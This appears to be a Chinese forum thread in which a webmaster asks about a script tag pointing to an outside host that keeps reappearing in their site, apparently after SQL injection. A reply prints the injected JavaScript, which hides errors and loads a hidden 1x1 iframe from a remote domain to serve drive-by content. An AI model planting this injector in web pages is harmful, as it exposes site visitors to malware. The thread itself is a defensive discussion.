這個網頁
http://www.renan.com.tw/simpchinese/CNC.asp
我查看原始檔,發現被植入了一個奇怪的JS連結
<script src=http://s.see9.us/s.js></script>
即使把檔案砍掉,換新的上去
上面還是會有這個連結
該怎麼辦呢?
這個連結是做什麼用的?
他是怎麼植入的呢?
懇請高人指點迷津
感激不盡
你可以試著用flashget或相關下載軟體將s.js這個檔案下載下來看看
我有稍微試了一下,可以下載下來
再把它打開來解讀看看
或許可以看出是否為惡意程式..
就我所知道 .js 一般都是javascript在使用的
提供給你做參考..
找了一下,可能是大陸那邊放出來的,討論區說是透過SQL Injection的方式所感染的。
我找了Google,發現被感染的好像不在少數,被感染的大部分title都會變成
公交車上的極品對白(超搞笑)"></"></title>
請注意兩個雙引號中間的東西...這個應該不是正常網頁title會出現的格式。
沒有仔細看,不過會透過js在網頁內嵌隱藏的iframe,然後在iframe裡面透過ActiveXObject來打開mediaplayer或realplayer的樣子。
至於為什麼會被嵌入,那要看看你asp怎麼寫的吧。伺服器也可能需要好好檢查。
補充該檔案的原始碼
document.writeln("<base onmouseover=\"window.status=\'完毕 \';return true\">");
document.writeln("<SCRIPT LANGUAGE=\"JavaScript\"> ");
document.writeln("<!-- Hide ");
document.writeln("function killErrors() { ");
document.writeln("return true; ");
document.writeln("} ");
document.writeln("window.onerror = killErrors; ");
document.writeln("\/\/ --> ");
document.writeln("<\/SCRIPT>");
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie10="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie10=risb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://b.kaobt.cn/img/hei.htm\" width=1 height=1><\/IFRAME>");
document.write("<div style=\"display:none\">");
document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1871936.js"></script>');
}
}Get();